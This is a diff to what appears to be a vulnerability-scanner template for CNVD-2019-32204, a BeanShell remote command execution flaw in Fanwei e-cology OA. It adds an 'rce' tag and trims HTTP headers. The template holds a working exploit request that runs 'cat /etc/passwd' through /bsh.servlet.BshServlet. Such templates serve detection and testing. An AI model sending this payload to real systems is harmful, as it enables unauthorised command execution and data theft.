--- a/cnvd/2019/CNVD-2019-32204.yaml
+++ b/cnvd/2019/CNVD-2019-32204.yaml
@@ -6,19 +6,14 @@ info:
   severity: critical
   description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
   reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
-  tags: fanwei,cnvd,cnvd2019
+  tags: fanwei,cnvd,cnvd2019,rce
 
 requests:
   - raw:
       - |
         POST /bsh.servlet.BshServlet HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Connection: keep-alive
         Content-Type: application/x-www-form-urlencoded
-        Cache-Control: max-age=0
-        Upgrade-Insecure-Requests: 1
 
         bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
 
